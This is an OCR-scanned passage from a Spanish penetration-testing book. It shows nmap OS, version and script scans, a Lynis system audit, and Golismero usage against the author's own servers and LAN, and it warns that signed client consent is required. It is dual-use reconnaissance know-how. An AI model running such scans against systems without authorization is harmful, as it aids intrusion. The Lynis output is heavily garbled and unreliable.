Running (J UST GUESSING): Linux 2.6.X (85 96) 

OS CPE: cpe:/o:linux:kernel:2.6 

Aggressive OS guesses: Linux 2.6.32 - 2.6.38 (85 96) 

No exact OS matches for host (test conditions non-ideal). Network 

Distance: 11 hops 

OS detection performed. Please report any incorrect results at 
http://nmap.org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 9.87 seconds 


Esto nos da información bastante precisa de qué sistema operativo ejecuta 
una máquina concreta. Podemos también obtener información de qué servidores 
ejecuta la máquina, y cuales son las versiones de estos servidores. Esto lo hacemos 
con: 


nmap -sV -T4 -F --version-all servidor 


Donde sV es la opción para sondear puerto, y version-all corresponde con 
emplear un sondeado con una intensidad máxima. T3 es la opción de temporalizacion; 
sila red es lenta y sujeta a timeouts debemos aumentar el tiempo de timeout poniendo 
el parámetro T2 o a lo sumo T1. T4 quizás sea demasiado agresivo en condiciones 
normales. 


Por ejemplo, si hacemos: 


nmap -sV -T4 -F --version-light www.orcero.org 
Obtenemos: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-20 13:38 
CEST 

Nmap scan report for www.orcero.org (188.165.231.195) 

Host is up (0.086s latency). 

rDNS record for 188.165.231.195: servidor 

Not shown: 94 closed ports 

PORT STATE SERVICE VERSION 
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22/tcp filtered ssh 


23/tcp open ssh OpenSSH 6.0p1 Debian 4+ 
deb7u4 (protocol 2.0) 

25/tcp Open smtp Sendmail 8.14.4/8.14.4/ 
Debian-4 

80/tcp open http lighttpd 1.4.31 

443/tcp open ssl/http lighttpd 1.4.31 

445/tcp filtered microsoft-ds 

Service Info: Host: www.orcero.org; OSs: Linux, Unix; CPE: 


cpe:/o:linux:kernel 

Service detection performed. Please report any incorrect results at 
http://nmap.org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds 


Es decir, una validación de los servidores y servicios de una máquina 
concreta en la práctica es tan sencilla como esto: 


irbis@paladio:~$ nmap -sV -T4 --version-all www.orcero.org 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-64-20 13:57 CEST 
Nmap scan report for www.orcero.org (188.165.231.195) 
Host is up (0.080s latency). 
rDNS record for 188.165.231.195: servidor 
Not shown: 994 closed ports 
STATE SERVICE VERSION 
filtered ssh 
open ssh OpenSSH 6,0p1 Debian 4+deb7u4 (protocol 2.0) 
open smtp Sendmail 8.14.4/8.14.4/Debian-4 
open http lighttpd 1.4.31 
open ssl/http lighttpd 1.4.31 
filtered microsoft-ds 
Info: Host: www.orcero.org; OSs: Linux, Unix; CPE: cpe:/o:linux:kernel 


detection performed, Please report any incorrect results at http://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 17.84 seconds 
irbis@paladio:~$ @ 





Observamos cómo hemos encontrado una buena aproximación de los 
distintos servidores en ejecución abiertos y versiones de cada servidor en concreto. 


Es importante que entendamos que apenas hemos “rascado” en la superficie de 
todo lo que puede hacer nmap. Por poner algunos ejemplos más, tenemos scripts que 
nos permiten hacer tareas mucho más avanzadas. Los scripts de uso más comun son: 


Y broadcast: Descubre máquinas adicionales a través del envio al medio de 
mensajes de broadcast. 


V brute: Intenta encontrar claves en la máquina a través de fuerza bruta. 


Y discovery: Busca toda la información que pueda sobre la máquina 
indicada. 


V dos: Realiza un ataque por denegación de servicio. 
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V exploit: Intenta atacar la máquina. 

V intrusive: Puede tumbar máquinas. 

VF malware: Busca malware instalado. 

V version: Realiza análisis. 

Y vul: Busca vulnerabilidades conocidas. 


Hay muchos más. Debemos siempre recordar que algo tan "inofensivo" 
como nmap es una herramienta de mucha potencia a la hora de realizar auditorías 
activas y tests de intrusión. Junto con nc, son las dos herramientas más infravaloradas 
del arsenal de cualquier pentester. 


Algunos ejemplos de ejecuciones de estos scripts de nmap son: 


nmap --script discovery 192.168.2.1 
Lo que genera: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-20 19:43 CEST 
Pre-scan script results: 
| targets-asn: 

targets-asn.asn is a mandatory parameter 


STATE SERVICE 
80/tcp open http 
| http-google-malware: [ERROR] No API key found. Update the variable A 
PIKEY in http-google-malware or set it in the argument http-google-mal 
ware.api 
| dns-client-subnet-scan: 
| ERROR: dns-client-subnet-scan.domain was not specified 
http-grep: 
.. ERROR: Argument http-grep,match was not set 
 http-title: Protected Object 
http-headers: 
WWW-Authenticate: Basic realm="TD-W8961ND" 
Content-Type: text/html 
Transfer-Encoding: chunked 
Server: RomPager/4.07 UPnP/1.0 
Connection: close 


.. (Request type: GET) 
http-auth-finder: 
Spidering limited to: maxdepthz3; maxpagecountz20; withinhostz192.16 
2L 

url nethod 

http://192.168.2.1:80/ HTTP: Basic 
http-chrono: Request times for /; avg: 152.57ms; min: 151.18ms; max: 
154,53ms 
_http-wordpress-plugins: nothing found amongst the 100 most popular p 
lugins, use --script-arg http-wordpress-plugins.search-«number|all» fo 
r deeper analysis) 


| 
| 
| 
| 
| 
| 
| 
| 
| 
| EXT: 
| 
| 
| 
| 
8 
| 
| 
| 


Host script results: 
| dns-brute: Can't guess domain of "192.168.2.1"; use dns-brute.domain 
script argument. 


Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds 
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Estamos sacando hasta el modelo del router Wifi y que el servidor web es 
un RomPager de Allegro con soporte UPnP, con lo que podemos comenzar a buscar 
vulnerabilidades con bastante facilidad. 


Por otro lado, si lo hacemos sobre un servidor productivo en Internet: 


nmap --script discovery www.orcero.org 


Nos genera toda esta información: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-20 19:43 CEST 
Pre-scan script results: 
| targets-asn: 
|. targets-asn.asn is a mandatory parameter 
Nmap scan report for www.orcero.org (188.165.231.195) Host is up (0.0865 latency). 
rDNS record for 188.165.231.195: servidor 
Not shown: 994 closed ports 
PORT STATE SERVICE 
22/tcp filtered ssh 
23/tcp open telnet 
dns-client-subnet-scan: 
|_ ERROR: dns-client-subnet-scan.domain was not specified 
_ banner: SSH-2.0-OpenSSH 6.0p1 Debian-4+deb7u4 | telnet-encryption: 
Telnet server does not support encryption 
25/tcp open smtp 
dns-client-subnet-scan: 
|, ERROR: dns-client-subnet-scan.domain was not specified 
_ banner: 220 www.orcero.org ESMTP Sendmail 
8.14.4/8.14.4/Debian-4+deb... 
smtp-commands: www.orcero.org Hello 
144.red-88-0-62.dynamicip.rima-tde.net [88.0.62.144], pleased to meet you, ENHANCEDSTATUSCO- 
DES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, 
DELIVERBY, HELP, 





| 2.0.0 This is sendmail version 8.14.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET 
NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info 
use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/ 
email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 


2.0.0 End of HELP info 
| smtp-open-relay: Server doesn't seem to be an open relay, all tests failed 


80/tcp open http 
| http-grep: 
|, ERROR: Argument http-grep.match was not set 
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| http-google-malware: [ERROR] No API key found. Update the variable APIKEY in http-google-ma- 
Iware or set it in the argument http-google-malware.api | dns-client-subnet-scan: 


|, ERROR: dns-client-subnet-scan.domain was not specified 
| http-date: Wed, 20 Apr 2016 17:51:07 GMT; +7т265 from local time. 


| http-title: Santo Orcero family pages 

| http-robots.txt: 9 disallowed entries 

[manual/ /manual-2.0/ /manual-1.3/ /addon-modules/ | /doc/ /images/ /all our e-mail addresses / 
admin/ / 

http-headers: 

X-Powered-By: PHP/5.4.45-0+deb7u2 

Content-type: text/html 

Connection: close 

Date: Wed, 20 Apr 2016 17:51:12 GMT 

Server: lighttpd/1.4.31 


|_ (Request type: HEAD) 

http-php-version: Versions from logo query (less accurate): 

5.3.0 - 5.3.10 

|. Version from header x-powered-by: PHP/5.4.45-0+deb7u2 

http-email-harvest: 

Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.orcero.org 
|. nikos@cbl.leeds.ac.uk 

| http-chrono: Request times for /; 

avg: 446.63ms; min: 358.95ms; max: 602.83ms 

| http-wordpress-plugins: nothing found amongst the 100 most popular plugins, use --script-arg http- 
wordpress-plugins.search=<numberlall> for deeper analysis) 


http-vhosts: 

| 405 names had status 200 

http-enum: 

/test.html: Test page 

/test.php: Test page 

/robots.txt: Robots file 

|. /perl/: Potentially interesting folder 

443/tcp open https 

| http-google-malware: [ERROR] No API key found. Update the variable APIKEY in http-google-ma- 
Iware or set it in the argument http-google-malware.api | dns-client-subnet-scan: 


|_ ERROR: dns-client-subnet-scan.domain was not specified | http-grep: 


|, ERROR: Argument http-grep.match was not set 
| http-date: Wed, 20 Apr 2016 17:51:07 GMT; +7т265 from local time. 
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http-php-version: Versions from logo query (less accurate): 
5.3.0 - 5.3.10 

| Version from header x-powered-by: PHP/5.4.45-0+deb7u2 
http-headers: 

X-Powered-By: PHP/5.4.45-0+deb7u2 

Content-type: text/html 

Connection: close 

Date: Wed, 20 Apr 2016 17:51:08 GMT 

Server: lighttpd/1.4.31 


|_ (Request type: HEAD) 

ssl-cert: Subject: commonName=www.orcero.org/organizationName=Orcero/ 
stateOrProvinceName=Espa\xC3\x83\xC2\xBla/countryName=ES 
Not valid before: 2014-01-09 09:41:34 |_Not valid after: 2024-01-07 09:41:34 |_http-chrono: Request 
times for /; 

avg: 820.62ms; min: 464.01ms; max: 1095.57ms 
ssl-google-cert-catalog: | No DB entry 

http-vhosts: 

| 405 names had status 200 

ssl-enum-ciphers: 

TLSv1.0 

Ciphers (10) 

TLS ECDHE RSA WITH 3DES ЕРЕ CBC ЅНА - strong 

TLS ECDHE RSA WITH AES 128 CBC SHA- strong 

TLS ECDHE RSA WITH AES 256 CBC SHA - unknown strength 
TLS ECDHE RSA WITH RCA 128 SHA- strong 

TLS RSA WITH 3DES ЕРЕ CBC SHA- strong 

TLS RSA WITH AES 128 CBC ЅНА - strong 

TLS RSA WITH AES 256 CBC_SHA- unknown strength 

TLS RSA WITH CAMELLIA 128 CBC SHA - unknown strength 
TLS RSA WITH CAMELLIA 256 CBC SHA - unknown strength 
TLS RSA WITH АС4 128 SHA- strong 

Compressors (1) 

NULL 

TLSv1.1 

Ciphers (10) 

TLS ECDHE RSA WITH 3DES ЕРЕ CBC ЅНА - strong 

TLS ECDHE RSA WITH AES 128 CBC SHA- strong 

TLS ECDHE RSA WITH AES 256 CBC SHA - unknown strength 
TLS ECDHE RSA WITH RCA 128 SHA- strong 

TLS RSA WITH 3DES ЕРЕ CBC SHA- strong 

TLS RSA WITH AES 128 CBC ЅНА - strong 

TLS RSA WITH AES 256 CBC_SHA- unknown strength 

TLS RSA WITH CAMELLIA 128 CBC SHA - unknown strength 
TLS RSA WITH CAMELLIA 256 CBC SHA - unknown strength 
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TLS RSA WITH RC4 128 SHA- strong 

Compressors (1) 

NULL 

TLSv1.2 

Ciphers (14) 

TLS ECDHE RSA WITH 3DES EDE CBC SHA- strong 

TLS ECDHE RSA WITH AES 128 CBC_SHA- strong 

TLS ECDHE RSA WITH AES 128 CBC SHA256 - strong 

TLS ECDHE RSA WITH AES 256 CBC SHA - unknown strength 
TLS ECDHE RSA WITH AES 256 CBC SHA384 - unknown strength 
TLS ECDHE RSA WITH RCA 128 SHA- strong 

TLS RSA WITH 3DES EDE CBC SHA- strong 

TLS RSA WITH AES 128 CBC SHA- strong 

TLS RSA WITH AES 128 CBC SHA256 - strong 

TLS RSA WITH AES 256 CBC_SHA- unknown strength 

TLS RSA WITH AES 256 CBC SHA256 - unknown strength 
TLS RSA WITH CAMELLIA 128 CBC SHA - unknown strength 
TLS RSA WITH CAMELLIA 256 CBC SHA - unknown strength 
TLS RSA WITH RC4 128 SHA- strong 

Compressors (1) 

NULL 

|. Least strength = unknown strength | http-enum: 


/blog/: Blog 
|. /blog/wp-login.php: Wordpress login page. 
445/tcp filtered microsoft-ds 


Host script results: 

| whois: Record found at whois.ripe.net 

inetnum: 188.165.192.0 - 188.165.255.255 

netname: OVH 

descr: OVH SAS | country: FR | asn-query: No Answers 


dns-brute: 

DNS Brute-force hostnames 
www.orcero.org - 188.165.231.195 

| mail.orcero.org - 188.165.231.195 


Nmap done: 1 IP address (1 host up) scanned in 742.68 seconds 


Lo que es una salida extremadamente completa, y que da mucha informacion 
y referencia para progresar con posteriores ataques. 


Otro ejemplo; haciendo: 


nmap --script exploit almacen 
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Obtenemos: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-20 19:33 CEST 
Nmap scan report for almacen (192.168.2.20) 
Host is up (0.00012s latency). 
rDNS record for 192.168.2.20: almacen.trantor 
Not shown: 992 closed ports 
STATE SERVICE 
open ssh 
open smtp 
| smtp-vuln-cve2010- 4344; 
The SMTP server is not Exim: NOT VULNERABLE 
open http 
open грсріпа 
open netbios-ssn 
open microsoft-ds 
open submission 
| smtp-vuln-cve2010- 4344: 
| The SMTP server is not Exim: NOT VULNERABLE 
2049/tcp open nfs 
MAC Address: 00:22:4D:A4:22:6F (Mitac International) 


Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds 





Lo que nos da información que también podemos usar, especialmente si el 
script encuentra vulnerabilidades. 


Finalmente, haciendo: 
nmap --script malware www.orcero.org 
Tenemos: 


Starting Nmap 5.00 ( http://nmap.org ) at 2016-04-20 19:41 CEST 

Nmap scan report for www.orcero.org (188.165.231.195) 

Host is up (0.078s Latency). 

rDNS record for 188.165.231.195: servidor 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp filtered ssh 

23/tcp open telnet 

25/tcp open smtp 

80/tcp open http 

| http-google-malware: [ERROR] No API key found. Update the variable A 
PIKEY in http-google-malware or set it in the argument http-google-mal 
are.api 

443/tcp open https 

| http-google-malware: [ERROR] No API key found. Update the variable A 
PIKEY in http-google-malware or set it in the argument http-google-mal 
are.api 

445/tcp filtered microsoft-ds 


Nmap done: 1 IP address (1 host up) scanned in 8.25 seconds 
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3.4 LYNIS 


No todos los análisis se hacen desde máquinas remotas. A veces queremos 
verificar las máquinas una vez que estamos dentro, es decir, cuando ya tenemos 
acceso local. 


La utilidad clave para hacer el análisis de máquinas es Lynis. Se lanza con 
el comando: 


lynis audit system 


Si lo que queremos es hacer una auditoría del sistema desde la cuenta de 
root; О: 


lynis audit system --pentest 


Si no tenemos privilegios de administrador, y queremos hacer un test de 
penetración para descubrir qué puede encontrar un atacante desde una cuenta no 
privilegiada -evidentemente, debemos lanzar Гуш desde esa cuenta, lo que nos 
puede llevar a ejecutar Lynis sin instalarlo desde el sistema de paquetería, lo que se 
hará de forma distinta según el escenario-. 


Un ejemplo del comportamiento de Lynis ejecutado en la propia Kali es: 


Note: plugins have more extensive tests, which may take a few minutes to complete 


: debian 
[ 


[+] Deblan Tests 


> required by Debian Test 


Authentication Modules) : 
[ Not Installed ] 
Г Not Instatled ] 


[ NOT ENCRYPTED ] 
jev/loopBEf-12C [ NOT ENCRYPTED ] 
1С Г NOT ENCRYPTED ] 
NOT INSTALLED ] 


[ Not Installed ] 
[ Installed and enabled fos 
[ Not Installed ] 
[ Not Installed ] 
[ Not Installed ] 
[ Not Installed ] 





[ Press [ENTER] to continue, ог [CTRL]+C 
~ 
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Boot and services 


се Manager 
jot loader 
running 
esult: ind 
“heck enabled ser 
ult: found 
tartup 


ess [ENTER] to continue, or [CIRL]+C to stop 


Кегпе1 


king de rur 
king C support 
rt: PAE | supported 
«kernel E 
Checking kernel type 
hecking loaded kernel modules 
Found 80 act Les 
king Linux kerr configuration file 
veduler 
update 
onfiguration 
e dumps configuration 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 


Press [ENTER] to continue, ог [CTRL]+C to stop ) 


Memory and processes 


necking /р minto 
ne К moie proc 


waiting process 


Press [ENTER] to continue, or [CTRL]*C to stop 


[+] Users, Groups and Authentication 


Checking | oup names 

hack 1 cons 

Jue гу ( daemons 
authentication support 


Checking 1 password stren 

cking PAM configuration 

king PAM configuration 
king 
recking 
king 

cing « 

king 


] 
] 
] 
[ OK ] 
] 
] 


UNKNOWN ] 
DONE 
DONE 


OK 


RUNLEVEL 5 ] 


FOUND ] 
DONE ] 
DONE ] 
DONE 


FOUND ] 
FOUND ] 
OK ] 
DISABLED 
DEFAULT 
NO ] 


FOUND ] 


г OK ] 


OK ] 


OK 
OK 
OK 
OK 
OK 
DONE ] 


[ NOT ENABLED ] 


NOT ENABLED ] 
FOUND ] 

OK ] 
SUGGESTION 
FOUND ] 

FOUND 1 

FOUND 1 

NOT FOUND ] 
OK ] 


[ OK j 


DISABLED ] 
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Checking LDAP 


[ Press [ENTER] to continue, or [CTRL]+C 


Shells 


[ Press [ENTER] to continue, or [СТВІ ]+С 


File systems 


mount points 


eckine 
SUPP 
ecking Locate dat 


[ENTER] to continue, ог [CTRL]+ 


sion timeout settings/tools 


Press [ENTER] to continue, ог [CTRL]+C 


[+] File systems 


ume groups 
5 mount points (fstab) 
swap partitions (fstab) 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 


Storage 


[ Press [ENTER] to continue, or [CTRL]+ 


to stop ] 


to stop | 


to stop 


to stop ] 
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[ SUGGESTION ] 
[ SUGGESTION ] 
[ NOT ENABLED ] 


[ NONE ] 


[ SUGGESTION ] 


OK ] 


[ SUGGESTION ] 
MET 


NONE 


[ NONE ] 
[ CHECK NEEDED ] 
[ OK ] 


OK ] 


[ DISABLED ] 
[ FOUND | 


SUGGESTION ] 
DK ] 
SUGGESTION ] 
NONE ] 

NONE ] 

NONE ] 

CHECK NEEDED ] 
ОК ] 

ОК ] 
DISABLED ] 
FOUND ] 


NOT DISABLED ] 
NOT DISABLED | 
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driver (modprobe config) 
r (modprebe config) 


running NFS 


Press [ENTER] to continue, or [CTRL]+C to stop ] 


] Name services 


Checking default DNS s n domain 
K ing /etc/re ES options 


hecking BIND statu 
hecking PowerDN 


Press [ENTER] to continue, or [CTRL]+C€ to stop ] 


[ Press [ENTER] to continue, or [CTRL]*C to stop 


[+] Name services 


Checking default search domain 
Checking / resolv.conf options 
searching 0 domain name 
Domain name: localhost 
shecking nscd status 
ing BI! 

ing P 

ing y 

d 
checking /et (duplicates) 
checking /etc/ s (hostname) 
Checking / / (localhost) 


ND status 


Press [ENTER] to continue, or [CTRL]*C to stop 


ching p де managers 
rching dpkg package manage 
Querying ckage manage 
- Query unpurged packages 
Checking security repository in 
thecking vulnerable packages (apt-get only) 


Checking package audit tool 


Press [ENTER] to continue, or [CTRL]*C to stop 


sourcas.list file or directory 


[ NOT DISABLED ] 
[ NOT DISABLED ] 


DONE ] 
DONE ] 


[ DONE ] 
[ NOT FOUND ] 


[ NONE ] 
[ NONE ] 
[ FOUND ] 


[ NOT FOUND ] 


NOT FOUND ] 
NOT FOUND ] 
NOT FOUND ] 


[ OK ] 
[ OK ] 
[ SUGGESTION ] 


NONE ] 
NONE | 
FOUND ] 


FOUND 
FOUND 
FOUND 
FOUND 


SUGGESTION | 


[ FOUND ] 


[ NONE ] 
Ed [ 
[ DONE ] 
| | 





Descargado en: eybooks.com 
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Networking 


nameservers 


"P/UDP) 


- Checking 
- Checking 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 
L| 


] Software: firewalls 


[ Press [ENTER] to continue, ог [CTRL]*C to stop ] 


] Software: webserver 


- Check 
Info 
* Loadab 
modules 


i-DoS/brute force 
pamhaus) 
firewall 


- Checking nginx 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 


Ё Press [ENTER] to continue, or [CTRL]+C 
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OK J 


DONE J 
DONE J 


OK ] 
OK ] 
RUNNING ] 


FOUND 
RUNNING | 


FOUND ] 
FOUND ] 
FOUND ] 
ACTIVE ] 


FOUND ] 
FOUND ] 


NOT FOUND | 
NOT FOUND ] 
NOT FOUND | 
NOT FOUND | 
NOT FOUND | 


HOT FOUND | 





© КА-МА Capítulo 3. RECOGIDA DE INFORMACIÓN INICIAL CON KALI 95 


- Checking running aemon 


Press [ENTER] to continue, ог [CTRL]+C to stop 


[CTRL] +€ 


[CTRL +С 


functions 
|» option 


[ Press [ENTER] to continue, or [СТВІ ]+( 


Squid Support 


cking running emon 


ess [ENTER] to continue, or [CTRL]«C to stop ] 


Logging and files 


cking 
ing 
cking 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 


[+] Insecure services 


[ Press [ENTER] to continue, ог [СТВІ ]+С to stop | 


[ NOT FOUND 


[ NOT FOUND 


[ FOUND ] 
[ FOUND ] 
[ OFF ] 

[ OFF ] 

[ ON ] 

[ OFF ] 


NOT FOUND | 


ок ] 

NOT FOUND | 
FOUND ] 

NOT FOUND | 
FOUND ] 

NOT FOUND | 
NOT FOUND 
ок 

DONE 

DONE ] 
FILES FOUND ] 


NOT ACTIVE ] 
0K ] 
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[ Press [ENTER] to continue, or [CTRL]*C to stop ] 


Banners and identification 


FOUND ] 
OK ] 
WEAK 
FOUND 
WEAK | 
FOUND ] 
WEAK ] 


Press [ENTER] to continue, ог [CTRL]+ 


[+] Scheduled tasks 


ing crontab/cronjob DONE ] 
C ng atd status NOT RUNNING ] 


[ Press [ENTER] to continue, [CTRL] «C 


Accounting 


NOT FOUND ] 
f O NOT FOUND ] 
cking auditd NOT FOUND ] 


Press [ENTER] to continue, or [СТВІ ]+‹ 


Checking for а running NTP daemon or c 


[ Press [ENTER] to continue, ог [CTRL]+H 


[+] Cryptography 
Checking SSL certificate ex 


[ Press [ENTER] to continue, or [CTRL]+C 
[+] Virtualization 


or [CTRL]+C 


[ Press [ENTER] to continue, 


Security frameworks 


С g [ NOT FOUND ] 
í i resence ‹ [ NOT FOUND ] 
í лс [ FOUND ] 

í [ NONE 


[ Press [ENTER] to continue, or [CTRL]+C to stop ] 
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[+] Software: file integrity 


ecking f integrity tools 


cing pre ico in ity tool 


[ Press [ENTER] to continue, or [CTRL]+C 


ing auto 
mation tooling 


[ Press [ENTER] to continue, or [CTRL]+C 


[+] Software: Malware scanners 


- Checking chkr 


Press [ENTER] to continue, or [СТВІ | +С 


- Starting file permis is check 
'etc/lilo.conf 


/ root/ .ssh 


[ Press [ENTER] to continue, or [CTRL]+C 
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NOT FOUND 1 


NOT FOUND 7 


NOT FOUND 
NOT FOUND 
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[ Press [ENTER] to continue, or [CTRL ]+( 


Kernel Hardening 


Fault ,log 
ignore 


source 


DIFFEREN] 
DIFFERENT 
DIFFERENT 
DIFFERENT ] 


DIFFERENT ] 


DIFFERENT ] 
DIFFERENT ] 
DIFFERENT ] 
DIFFERENT ] 
DIFFERENT ] 


DIFFERENT 
DIFFERENT 


DIFFERENT 


[ Press [ENTER] to continue, ог [CIRL]4C to stop ] 
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Can't fin 
https://cisofy.com/contr 


Couldn't find 2 responsive nameservers [NETW-2705] 
https://cisofy.com/contr E j 


Jpgrading то 
nd E 


Lti-factor 
org/cont rol 
nfigure for 


to each APT 


ipgrades to det 
1 need restarting. 
i ont rol 
of vul abi 5 affect this installation. [CUST-G 
ont rol 
e files against MD5 checksums. [C 
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server agains oS/brute force attempts [HTTP -6649] 


" against Slowloris attacks [HTTP-6641] 
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Y los avisos de una ejecución de Lynis en una Debian normal -ejecución 
que, como vemos, da una información muy abundante-, es: 


Warnings: 
[20:08:51] Warning: Couldn't find 2 responsive 
nameservers [test:NETW-2705] [impact:L] 

[20:08:51] Warning: Found mail name in SMTP banner, and/or 

mail name contains ’Postfix’ [test:MAIL -8818] [impact:L] 

[20:08:51] Warning: Root can directly login via SSH [ test: SSH- 
7412] [impact:M] 

[20:08:51] Warning: No MySQL root password set [test: DBS-1816] 
[impact:H] 

[20:08:57] Warning: No running NTP daemon or available client 
found [test: TIME-3104] [impact:M] 

Suggestions: 

[20:08:38] Suggestion: update to the latest stable release. 

[20:08:43] Suggestion: Install a PAM module for password 

strength testing like pam cracklib or pam passwdqc [test:AUTH-9262] 

[20:08:43] Suggestion: When possible set expire dates for all 

password protected accounts [test:AUTH-9282] 

[20:08:43] Suggestion: Configure password aging limits to 
enforce password changing on a regular base [test:AUTH-9286] 

[20:08:43] Suggestion: Default umask in /etc/profile could be 
more strict like 027 [test:AUTH-9328] 

[20:08:43] Suggestion: Default umask in /etc/login. defs could be 
more strict like 027 [test:AUTH-9328] 

[20:08:43] Suggestion: Default umask in /etc/init.d/ rc could be 
more strict like 027 [test:AUTH-9328] 

[20:08:44] Suggestion: To decrease the impact of a full /tmp 
file system, place /tmp on a separated partition [test:FILE-6310] 

[20:08:44] Suggestion: The database required for ’ locate’ 
could not be found. Run ’updatedb’ or ’ locate.updatedb' to 
create this file. [test:FILE -6410] 

[20:08:44] Suggestion: Disable drivers like USB storage 
when not used, to prevent unauthorized storage or data theft [test:STRG-1840] 

[20:08:44] Suggestion: Disable drivers like firewire storage when 

not used, to prevent unauthorized storage or data theft [test: STRG-1846] 

[20:08:51] Suggestion: Purge removed packages (10 found) with 
aptitude purge command, to cleanup old configuration files, 
cron jobs and startup scripts. 

[test:PKGS-7346] 

[20:08:51] Suggestion: Check your resolv.conf file and fill in a 
backup nameserver if possible [test: NETW-2705] 

[20:08:51] Suggestion: You are adviced to hide the mail name 
(option: smtpd banner) from your postfix configuration. Use 
postconf -e or change your main. cf file (/etc/postfix/main.cf) 
[test:MAIL-8818] 
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[20:08:51] Suggestion: Configure a firewall/packet filter to filter 
incoming and outgoing traffic [ test:FIRE-4590] 
[20:08:51] Suggestion: Use mysqladmin to set a MySQL root 
password (mysqladmin -u root -p password MYPASSWORD) [test:DBS-1816] 
[20:08:57] Suggestion: Add legal banner to /etc/motd, to warn 
unauthorized users [test:BANN-7122] 
[20:08:57] Suggestion: Add legal banner to /etc/issue 
to warn unauthorized users [test: BANN-7126] 
[20:08:57] Suggestion: Add legal banner to /etc/issue 
.net, to warn unauthorized users [test: BANN-7130] 
[20:08:57] Suggestion: Enable auditd to collect audit information 
[test:ACCT-9628] 
[20:08:57] Suggestion: Check if any NTP daemon is running 
or a NTP client gets executed daily, to prevent big time 
differences and avoid problems with services like kerberos, 
authentication or logging differences. [test: TIME-3104] 
[20:08:57] Suggestion: Install a file integrity tool [test:FINT-4350] 
[20:08:58] Suggestion: One or more sysctl values differ from the 
scan profile and could be tweaked [ test:KRNL-6000] 
[20:08:58] Suggestion: Harden the system by removing unneeded 
compilers. This can decrease the chance of 
customized trojans, backdoors and rootkits to be compiled 
and installed [test: HRDN-7220] 
[20:08:58] Suggestion: Harden compilers and restrict access to 
world [test:HRDN-7222] 
[20:08:58] Suggestion: Harden the system by 
installing one or malware scanners to perform periodic 
file system scans [test: HRDN-7230] 


Vemos que nos muestra vulnerabilidades, algunas fácilmente explotables, 


como un mysql local sin contrasena. 


3.9 GOLISMERO 


Golismero es una utilidad bastante completa de busqueda de información de 


un servidor web, de su servidor y su dominio. La forma básica de uso es: 


golismero scan servidor 


Golismero realmente es bastante más completo de lo aquí expuesto, y nos 


permite automatizar los tests de penetración contra el propio servidor; por cómo está 
disenado, es una estrategia potencial instalar Golismero en la red, cronearlo, y que dé 
reportes periódicos a la gente de sistemas de las novedades encontradas. 


Vamos a ver un ejemplo de uso. Por ejemplo, si hacemos: 


golismero scan www.orcero.org 
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La salida será: 
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Recuerda que Golismero, al igual que algunas de las opciones de nmap, 
realizan realmente un ataque; por lo que recuerda que antes deberás haber hecho 
lo que te he explicado en la segunda fase. Especialmente con el consentimiento 
informado; en el que tal y como te comenté en la sección 1.4, debes incluir los 
efectos que puede causar tus pruebas, indicando la probabilidad de que afecte a la 
producción y el daño que puedes hacer. Si el cliente no ha firmado el consentimiento 
informado antes de realizar las operaciones, te vas a ganar una demanda judicial que 
vas a perder; como mínimo, por la responsabilidad civil del daño. Y además, con 
toda la razón del mundo. Estás avisado. 


3.6 OTRAS UTILIDADES 


Solo con estas herramientas que hemos estudiado hasta ahora, ya podemos 
obtener un listado bastante completo de máquinas accesibles desde dónde estamos 
haciendo las pruebas, y para cada máquina qué sistema operativo utiliza, qué puertos 
tiene abiertos, qué servidores en concreto ejecuta oyendo estos puertos, y cuales son 
las versiones concretas de estos servidores. Mucha información que nos permitirá 
luego buscar vulnerabilidades en etapas posteriores. 


Realmente hay muchas otras utilidades y técnicas para obtener información 
que podremos emplear a partir de este punto. La casuística es muy grande, y nos 
podría llevar un libro tan grande como este el cubrir los escenarios más frecuentes. 
Pasamos a enumerar las técnicas, con objeto de que podamos aplicarlas según el 
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escenario -no es dificil intuir qué técnica aplicamos en cada momento a partir de su 
descripción-. 


Las técnicas más importantes son: 
V nbtscan: Extracción de información de SMB. 


Y AccCheck: Verificación de accesos a los recursos virtuales IPC$ y 
ADMINS. 


Р Nikto: Buscador de plugins de CMS, de propósito general. Muy bueno, 
busca también fallos de configuración, información descubierta, 
inyecciones XSS, DoS, obtención de archivos remotos, subida de archivos 
a máquina remota, obtención de shell remota, inclusión de código remoto, 
evitar autentificación, identificación de servidores web no actualizados, 
o identificar aspectos del software, entre otras características. Vamos a 
hablar un poco más adelante de él con detalle. 


Y BlindElephant: Buscador de plugins de CMS, de propósito general, pero 
buena buscando plugins de Drupal y Wordpress. 


Y Plecost: Buscador de plugins de WordPress. 


Y Wpscan: Buscador de plugins de WordPress. Vamos a hablar un poco 
más adelante de él con detalle. 


Y JoomScan: Buscador de plugins de Joomla. 





ANÁLISIS BÁSICO DE 
VULNERABILIDADES 


Cuando nos referimos a "análisis básico de vulnerabilidades" no nosreferimos 
a que haya distintas fases o subdivisiones respecto al análisis de vulnerabilidades; sino 
que vamos a introducir una serie de técnicas básicas para analizar vulnerabilidades. 


Es importante que tengamos en cuenta que el concepto de vulnerabilidad, 
en sí, es relativo: la vulnerabilidad depende en gran medida del uso que se supone 
